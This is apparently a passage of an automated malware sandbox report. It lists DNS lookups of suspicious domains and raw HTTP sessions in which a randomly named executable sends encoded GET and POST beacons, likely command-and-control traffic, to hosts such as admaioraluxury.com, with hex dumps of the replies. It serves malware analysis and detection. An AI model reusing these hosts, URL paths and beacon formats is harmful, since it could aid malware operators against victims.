Oct 10, 2024 14:13:37.892887115 CEST	1.1.1.1	192.168.2.4	0xd742	No error (0)	www.le-pier.online		217.76.128.34	A (IP address)	IN (0x0001)	false
Oct 10, 2024 14:13:51.683814049 CEST	1.1.1.1	192.168.2.4	0xb900	No error (0)	www.37wx.baby		209.146.101.85	A (IP address)	IN (0x0001)	false
Oct 10, 2024 14:14:04.969868898 CEST	1.1.1.1	192.168.2.4	0xbc4	No error (0)	www.avantfize.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 10, 2024 14:14:04.969868898 CEST	1.1.1.1	192.168.2.4	0xbc4	No error (0)	www.avantfize.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 10, 2024 14:14:19.015136957 CEST	1.1.1.1	192.168.2.4	0x70cc	No error (0)	www.zippio.top		203.161.46.201	A (IP address)	IN (0x0001)	false
Oct 10, 2024 14:14:32.556868076 CEST	1.1.1.1	192.168.2.4	0x3ae2	No error (0)	www.alanshortz.buzz		161.97.168.245	A (IP address)	IN (0x0001)	false
Oct 10, 2024 14:14:46.620403051 CEST	1.1.1.1	192.168.2.4	0x8f8a	No error (0)	www.mtmoriacolives.store		103.42.108.46	A (IP address)	IN (0x0001)	false
Oct 10, 2024 14:15:01.195056915 CEST	1.1.1.1	192.168.2.4	0xddc7	Name error (3)	www.trytalnts.online	none	none	A (IP address)	IN (0x0001)	false
Oct 10, 2024 14:15:09.546943903 CEST	1.1.1.1	192.168.2.4	0x1dab	No error (0)	www.gloryastore.site	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 10, 2024 14:15:09.546943903 CEST	1.1.1.1	192.168.2.4	0x1dab	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 10, 2024 14:15:09.546943903 CEST	1.1.1.1	192.168.2.4	0x1dab	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.sendly.digital

www.admaioraluxury.com

www.tyc01054.top

www.le-pier.online

www.37wx.baby

www.avantfize.shop

www.zippio.top

www.alanshortz.buzz

www.mtmoriacolives.store

www.gloryastore.site

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	194.58.112.174	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:12:34.002047062 CEST	517	OUT	GET /wpye/?GHcxP=10HpjR&DX3L=BI3NUQzh1Y0aSVFpIlwXAyDki6kTKkkQhFQYkuvpiSdvxBH4iFlEbnV8tqZ2t35htM7z3AOv1Vp0NfxeBIyvsGNDHWPWavPfmrFZb+Np2iJLfzkfEMuMkRM= HTTP/1.1 Host: www.sendly.digital Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Oct 10, 2024 14:12:34.680771112 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 10 Oct 2024 12:12:34 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 32 39 35 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 73 65 6e 64 6c 79 2e 64 69 67 69 74 61 6c 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 [TRUNCATED] Data Ascii: 2953<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.sendly.digital</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/<![CDATA[/window.trackScriptLoad = function(){};/.../</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text">  <a class="b-link" href="https://reg.ru [TRUNCATED]
Oct 10, 2024 14:12:34.680835009 CEST	224	IN	Data Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f 63 Data Ascii: <div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.sendly.digital</h1><p class
Oct 10, 2024 14:12:34.680871010 CEST	1236	IN	Data Raw: 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 64 65 73 63 72 69 70 74 69 6f 6e 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 bd 3c Data Ascii: ="b-parking__header-description b-text"> <br>   .</p><div class="b-parking__buttons-wrapper"><a class="b-button b-button_color_reference b-button_size_normal
Oct 10, 2024 14:12:34.680903912 CEST	1236	IN	Data Raw: 6f 2d 69 6d 61 67 65 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 3e 3c 2f 73 70 61 6e 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 2d 6d 61 72 67 69 6e 5f 6c 65 66 74 2d 6c 61 72 67 65 22 3e 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 62 2d 74 69 74 Data Ascii: o-image_type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compact"></strong><p class="b-text b-parking__promo-subtitle l-margin_bottom-none">  </p
Oct 10, 2024 14:12:34.680936098 CEST	1236	IN	Data Raw: 77 77 2e 72 65 67 2e 72 75 2f 68 6f 73 74 69 6e 67 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 77 77 77 2e 73 65 6e 64 6c 79 2e 64 69 67 69 74 61 6c 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 Data Ascii: ww.reg.ru/hosting/?utm_source=www.sendly.digital&utm_medium=parking&utm_campaign=s_land_host&reg_source=parking_auto"> </a><p class="b-price b-parking__price"> <b class="b-price__amount">83 <span class=
Oct 10, 2024 14:12:34.680969000 CEST	1236	IN	Data Raw: d0 bd d0 b8 d1 8f 20 d0 bd d0 b0 26 6e 62 73 70 3b 43 4d 53 3c 2f 73 74 72 6f 6e 67 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 74 65 78 74 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 64 65 73 63 72 69 70 74 69 6f 6e 22 3e d0 98 d1 81 d0 bf Data Ascii:  CMS</strong><p class="b-text b-parking__promo-description">  CMS
Oct 10, 2024 14:12:34.681000948 CEST	1236	IN	Data Raw: 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 62 75 69 6c 64 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f 61 75 74 6f 22 3e d0 97 d0 b0 d0 ba d0 b0 d0 b7 d0 b0 d1 82 d1 8c 3c 2f 61 3e 3c 2f 64 69 Data Ascii: ng&utm_campaign=s_land_build&reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__ssl-protection"><span class="b-parking__promo-image b-parking__promo-image_type_ssl l-margin_right-large"></span>
Oct 10, 2024 14:12:34.681034088 CEST	1236	IN	Data Raw: d1 87 d1 88 d0 b8 d1 82 d0 b5 20 d0 b5 d0 b3 d0 be 20 53 45 4f 2d d0 bf d0 be d0 ba d0 b0 d0 b7 d0 b0 d1 82 d0 b5 d0 bb d0 b8 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 61 72 74 69 63 6c 65 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 Data Ascii: SEO-.</p></div></div></article><script onload="window.trackScriptLoad('parking-rdap-auto.js')" onerror="window.trackScriptLoad('parking-rdap-auto.js', 1)" src="parking-rdap-auto.js" charset="utf-8"></scrip
Oct 10, 2024 14:12:34.681065083 CEST	1236	IN	Data Raw: 2e 6d 61 74 63 68 28 20 2f 78 6e 2d 2d 2f 20 29 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 20 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 73 70 61 6e 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 Data Ascii: .match( /xn--/ ) && document.querySelectorAll ) { var spans = document.querySelectorAll( 'span.puny, span.no-puny' ), t = 'textContent' in document.body ? 'textContent' : 'innerText'; var domainName = document.titl
Oct 10, 2024 14:12:34.681101084 CEST	630	IN	Data Raw: 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 6d 2c 65 2c 74 2c 72 2c 69 2c 6b 2c 61 29 7b 6d 5b 69 5d 3d 6d 5b 69 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 28 6d 5b 69 5d 2e 61 3d Data Ascii: ipt type="text/javascript">(function(m,e,t,r,i,k,a){m[i]=m[i]\|\|function(){(m[i].a=m[i].a\|\|[]).push(arguments)}; m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	62.149.128.40	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:12:49.828502893 CEST	801	OUT	POST /sumy/ HTTP/1.1 Host: www.admaioraluxury.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Connection: close Content-Length: 201 Origin: http://www.admaioraluxury.com Referer: http://www.admaioraluxury.com/sumy/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 44 58 33 4c 3d 78 73 6c 30 69 75 43 52 43 2f 68 6b 37 41 78 44 58 52 78 50 68 62 62 53 67 58 30 66 34 4d 41 7a 73 6d 75 75 64 74 4f 63 53 38 34 32 4b 4f 70 6e 35 77 51 52 6b 54 6e 72 67 44 5a 6b 48 71 76 46 2b 58 58 67 4a 72 38 47 6a 30 5a 4e 45 31 55 4a 65 69 32 31 67 48 6c 63 6a 37 38 54 4b 53 6e 48 61 57 30 78 36 6c 61 31 68 2f 51 37 47 61 69 71 47 39 51 4f 74 62 79 52 6c 4a 2f 62 7a 33 79 75 42 45 59 32 56 72 78 75 42 64 77 4b 70 4c 45 51 62 2f 54 44 69 79 72 65 6b 6b 39 59 53 57 46 36 64 6e 4a 36 68 77 59 52 44 31 50 4a 31 75 63 38 70 43 34 69 7a 66 35 37 47 2b 45 37 35 53 78 55 61 67 3d 3d Data Ascii: DX3L=xsl0iuCRC/hk7AxDXRxPhbbSgX0f4MAzsmuudtOcS842KOpn5wQRkTnrgDZkHqvF+XXgJr8Gj0ZNE1UJei21gHlcj78TKSnHaW0x6la1h/Q7GaiqG9QOtbyRlJ/bz3yuBEY2VrxuBdwKpLEQb/TDiyrekk9YSWF6dnJ6hwYRD1PJ1uc8pC4izf57G+E75SxUag==
Oct 10, 2024 14:12:50.500413895 CEST	1236	IN	HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET Date: Thu, 10 Oct 2024 12:12:49 GMT Connection: close Content-Length: 4954 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
Oct 10, 2024 14:12:50.500477076 CEST	224	IN	Data Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;
Oct 10, 2024 14:12:50.500514030 CEST	1236	IN	Data Raw: 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 43 38 37 42 32 3b 20 0a 7d 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 Data Ascii: background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} .content-container p{margin:0 0 10px 0; }#details-left{
Oct 10, 2024 14:12:50.500546932 CEST	1236	IN	Data Raw: 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 33 3e 20 0a 20 20 3c 68 34 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 68 61 73 20 62 65 65 Data Ascii: >HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.</h4> </div> <div class="content-container"> <fieldset><h4>Most likely causes:</h4> <ul> <
Oct 10, 2024 14:12:50.500580072 CEST	1236	IN	Data Raw: 62 73 70 3b 4d 61 70 52 65 71 75 65 73 74 48 61 6e 64 6c 65 72 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 20 63 6c 61 73 73 3d 22 61 6c 74 22 3e 3c 74 68 3e 48 61 6e 64 6c 65 72 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 Data Ascii: bsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>   StaticFile</td></tr> <tr><th>Error Code</th><td>   0x80070002</td></tr> </table> </div> <div id="details-right">
Oct 10, 2024 14:12:50.500616074 CEST	5	IN	Data Raw: 6d 6c 3e 20 0a Data Ascii: ml>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	62.149.128.40	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:12:52.373155117 CEST	821	OUT	POST /sumy/ HTTP/1.1 Host: www.admaioraluxury.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Connection: close Content-Length: 221 Origin: http://www.admaioraluxury.com Referer: http://www.admaioraluxury.com/sumy/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 44 58 33 4c 3d 78 73 6c 30 69 75 43 52 43 2f 68 6b 34 67 42 44 55 32 64 50 32 4c 62 56 75 33 30 66 79 73 41 76 73 6e 53 75 64 70 32 4d 54 4a 51 32 4e 73 78 6e 36 78 51 52 6e 54 6e 72 6f 6a 5a 6c 44 71 75 48 2b 58 4c 65 4a 76 30 47 6a 30 4e 4e 45 78 59 4a 4c 46 61 36 6a 33 6b 36 71 62 38 64 48 79 6e 48 61 57 30 78 36 6b 2b 62 68 2f 59 37 47 71 53 71 41 63 51 50 67 37 79 51 31 5a 2f 62 34 58 79 71 42 45 5a 56 56 71 74 45 42 62 30 4b 70 4c 30 51 62 72 50 41 6f 79 72 48 72 45 38 33 54 58 63 52 58 31 49 51 6f 43 55 58 44 52 58 37 39 49 4e 6d 34 7a 5a 31 68 66 64 49 62 35 4e 50 30 52 4d 64 42 72 75 56 78 46 4a 4b 2b 37 4a 66 32 43 45 6b 2f 70 43 57 70 66 30 3d Data Ascii: DX3L=xsl0iuCRC/hk4gBDU2dP2LbVu30fysAvsnSudp2MTJQ2Nsxn6xQRnTnrojZlDquH+XLeJv0Gj0NNExYJLFa6j3k6qb8dHynHaW0x6k+bh/Y7GqSqAcQPg7yQ1Z/b4XyqBEZVVqtEBb0KpL0QbrPAoyrHrE83TXcRX1IQoCUXDRX79INm4zZ1hfdIb5NP0RMdBruVxFJK+7Jf2CEk/pCWpf0=
Oct 10, 2024 14:12:53.049371958 CEST	1236	IN	HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET Date: Thu, 10 Oct 2024 12:12:52 GMT Connection: close Content-Length: 4954 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
Oct 10, 2024 14:12:53.049396038 CEST	1236	IN	Data Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
Oct 10, 2024 14:12:53.049411058 CEST	1236	IN	Data Raw: 3a 69 74 61 6c 69 63 3b 7d 20 0a 2e 63 6c 65 61 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d 20 0a 2e 70 72 65 66 65 72 72 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 20 32 70 78 20 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
Oct 10, 2024 14:12:53.049438000 CEST	1236	IN	Data Raw: 6d 61 74 69 6f 6e 3a 3c 2f 68 34 3e 20 0a 20 20 3c 64 69 76 20 69 64 3d 22 64 65 74 61 69 6c 73 2d 6c 65 66 74 22 3e 20 0a 20 20 20 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c Data Ascii: mation:</h4> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>   IIS Web Core</td></tr> <tr><th>Notification</th><td>   MapRequestHandl
Oct 10, 2024 14:12:53.049453020 CEST	229	IN	Data Raw: 20 64 69 72 65 63 74 6f 72 79 20 61 6e 64 20 74 72 79 20 74 68 65 20 72 65 71 75 65 73 74 20 61 67 61 69 6e 2e 20 0a 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 Data Ascii: directory and try the request again. <p><a href="https://go.microsoft.com/fwlink/?LinkID=62293&IIS70Error=404,0,0x80070002,17763">View more information »</a></p> </fieldset> </div> </div> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	62.149.128.40	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:12:55.075122118 CEST	10903	OUT	POST /sumy/ HTTP/1.1 Host: www.admaioraluxury.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Connection: close Content-Length: 10301 Origin: http://www.admaioraluxury.com Referer: http://www.admaioraluxury.com/sumy/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 44 58 33 4c 3d 78 73 6c 30 69 75 43 52 43 2f 68 6b 34 67 42 44 55 32 64 50 32 4c 62 56 75 33 30 66 79 73 41 76 73 6e 53 75 64 70 32 4d 54 50 49 32 4b 5a 6c 6e 35 53 6f 52 6d 54 6e 72 69 44 5a 67 44 71 75 47 2b 58 44 61 4a 76 77 34 6a 33 31 4e 46 53 51 4a 50 45 61 36 30 6e 6b 36 6e 37 38 51 4b 53 6d 50 61 58 59 31 36 6b 75 62 68 2f 59 37 47 70 4b 71 48 4e 51 50 69 37 79 52 6c 4a 2f 50 7a 33 79 53 42 45 78 72 56 71 59 7a 41 71 49 4b 6f 76 51 51 64 59 6e 41 6b 79 72 46 6e 6b 38 76 54 58 67 4f 58 30 6b 